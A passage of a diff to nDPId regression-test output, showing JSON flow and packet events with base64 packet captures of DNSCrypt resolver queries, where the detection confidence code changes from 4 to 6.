AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00223{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946735705348} 00418{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAABQCgAAub0RuMEKAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAXcCgEgAL0Rk+0KAAABlTjkLYqnAbsGBJRGf0YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00223{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946735705348} 00418{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAABQCgEAub0RuMAKAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAAIcCgJAAL0Rd6wKAAABlTjkLYMdAbsCCDw8f0UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAAXcCgMgAL0Rk+sKAAABlTjkLYmcAbsGBJVVf0IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00223{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946735705349} 00418{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAABQCgMAub0RuL4KAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAAIcCgRAAL0Rd6oKAAABlTjkLeuNAbsCCDw8f0MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946735705453,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946735705453,"pkt":"ZmZmZmZmRERERERECABFAADUC5oAADQRQF2VOOQtCgAAAQG7lfQAwC\/rf0eBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946735705457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946735705457,"pkt":"ZmZmZmZmRERERERECABFAADUC5sAADQRQFyVOOQtCgAAAQG7640AwNpVf0OBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946735705457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946735705457,"pkt":"ZmZmZmZmRERERERECABFAADUC5wAADQRQFuVOOQtCgAAAQG7spoAwBNIf0SBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="} @@ -33,52 +33,52 @@ 